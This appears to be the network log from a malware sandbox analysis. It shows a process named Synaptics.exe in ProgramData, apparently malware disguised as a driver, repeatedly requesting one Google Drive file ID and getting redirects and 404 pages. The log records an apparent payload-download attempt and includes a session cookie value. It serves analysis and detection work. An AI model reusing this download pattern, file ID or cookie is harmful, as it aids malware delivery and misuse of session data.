2024-12-30 10:23:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:42 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-JC49LTlcTYYgekBww-bzqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
129 | 192.168.2.5 | 50044 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:42 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:43 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5ZD2Cx3DVUFy7nSi6fvDiXKlZOqEp8XFy2m0EWIYYq3qQXurt96-0IMx2ODAc7xohbJ4Krpbo
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:42 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-c6B9Mpd4k73fAg-RclD3Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:43 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:43 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="o8Ah_ksQSu9V8UOMkdH46Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:43 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.5 | 50047 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:42 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:42 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:42 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-H3RiC8Rv9p8wbXfxlGbCJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
131         192.168.2.5  50046        142.250.186.33   443               6192  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:23:42 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:43 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5q5lKU5oBT4DclLz_jqotqnIHT0lBBV6YmTmoTtjlVsfPVzboMSJF3MsSnfWup55O3R63NEnw
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:42 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-pDT_6tQV4k4bXDX4wpxhpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:43 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 
2024-12-30 10:23:43 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="TxVItGu34K03NNOfBNocsw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:43 UTC  122                IN         Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
132         192.168.2.5  50059        142.250.186.110  443               6192  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:23:43 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:44 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:43 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-iaa0BI5fC9H9NWKepQX3jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
133         192.168.2.5  50060        142.250.186.110  443               6192  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:23:43 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:44 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:43 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-WkvpbYbabe5Ps5G_3SToug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
134         192.168.2.5  50061        142.250.186.33   443               6192  C:\ProgramData\Synaptics\Synaptics.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:23:43 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:44 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7e7H9z2qsHgbMKGXxh38aVLreAZn8YVwa5n9_pN2ZXArwbrJGwQlsDqo77Y2P4y6iIvS8Mh1w
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:43 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-1cNiBmbkxIpOQvP7ywr-6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:44 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 
2024-12-30 10:23:44 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="r5Xq3BZU5MxK8kx10vPp1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:44 UTC  122                IN         Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.5 | 50062 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:43 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:44 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5xC5-j_elhMB8zpAe3XmFDIMgFuZRnbbda2GYDZ9HrI1vsR8jf66Iw4j4ZgMaZyfqmf3C7_Y4
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:44 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0DaGhszLsMyqHqDNZtEhAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:44 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:44 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="D4SB0YKKlwBdfmYdfdbifA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:44 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.5 | 50072 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:58 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:58 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6vkG_VJrNfRZUjr7WQR7Qy4Gnbey8YdNo-iPqkUwCNDfspRDEZdh7uw8k29QwfT73JLFRyGF0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:58 GMT
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-PeJbvPFtp55nRlEa-cUUdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:58 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:58 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="2247CqqbkoEpzBqTpVZ46w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:58 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.5 | 50067 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:58 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:58 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2jcb9xyCCqiyXPi17AqkiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
